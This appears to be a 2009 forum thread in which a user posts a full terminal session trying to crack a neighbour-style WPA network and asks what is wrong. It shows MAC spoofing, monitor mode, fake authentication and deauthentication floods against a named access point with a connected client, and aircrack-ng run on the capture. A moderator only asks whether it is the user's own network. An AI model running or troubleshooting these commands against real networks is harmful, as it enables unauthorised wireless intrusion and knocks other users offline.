Results 1 to 3 of 3

Thread: Dear friends tell me whats wrong (bt3 live cd)

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default Dear friends tell me whats wrong (bt3 live cd)

    Dear friend someone pls tell me whats wrong in my attempt to crack wpa/

    pls mention wat change i have to make in the commad

    [COLOR="DarkOrange"]bt ~ # airmon-ng
    ath0 Atheros madwifi-ng VAP (parent: wifi0)
    bt ~ # airmon-ng stop ath0
    ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    bt ~ # ifconfig wifi0 down
    bt ~ # macchanger --mac 00:11:22:33:44:55 wifi0
    Current MAC: 00:1r:9y:b0:bk:15 (unknown)
    Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
    bt ~ # airmon-ng start wifi0
    ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    bt ~ # airodump-ng ath0
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1B:57:FD:79D 13 24 0 0 11 54 WPA TKIP PSK Starcom
    00:18:39:2C5:EC 12 5 0 0 11 54. WEP WEP haseeb
    bt ~ # aireplay-ng -1 0 -a 00:1B:57:FD:79D -h 00:11:22:33:44:55 -e hacker ath0

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Is that your wlan? Did you try it without changing the mac?
    Tiocfaidh ár lá

  3. #3
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default

    20:26:00 Waiting for beacon frame (BSSID: 00:1B:57:FD:79D) on channel 11
    20:26:01 Sending Authentication Request (Open System)
    20:26:01 Authentication successful
    20:26:01 Sending Association Request [ACK]
    20:26:01 Denied (code 12), wrong ESSID or WPA ?
    20:26:04 Sending Authentication Request (Open System)
    aireplay-ng -0 5 -a 00:1B:57:FD:79D -h 00:11:22:33:44:55 -e UTStarcom ath0
    20:27:25 Waiting for beacon frame (BSSID: 00:1B:57:FD:79D) on channel 11
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:27:25 Sending DeAuth to broadcast -- BSSID: [00:1B:57:FD:79D]
    CH 11 ][ BAT: 1 hour 21 mins ][ Elapsed: 16 mins ][ 2009-07-16 20:18

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1B:57:FD:79D 3 21 7791 51 0 11 54 WPA TKIP PSK UTStarcom
    BSSID STATION PWR Rate Lost Packets Probes
    00:1B:57:FD:79D 00:1A:73:3C:02:AD 20 1-54 0 19
    aircrack-ng wpa-01.cap
    Opening wpa-01.cap
    Read 3020 packets.
    # BSSID ESSID Encryption
    1 00:1B:57:FD:79D UTStarcom WPA (0 handshake)
    Choosing first network as target.
    Opening wpa-01.cap
    Please specify a dictionary (option -w).
    Quitting aircrack-ng...
    aircrack-ng wpa-01.cap -w

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •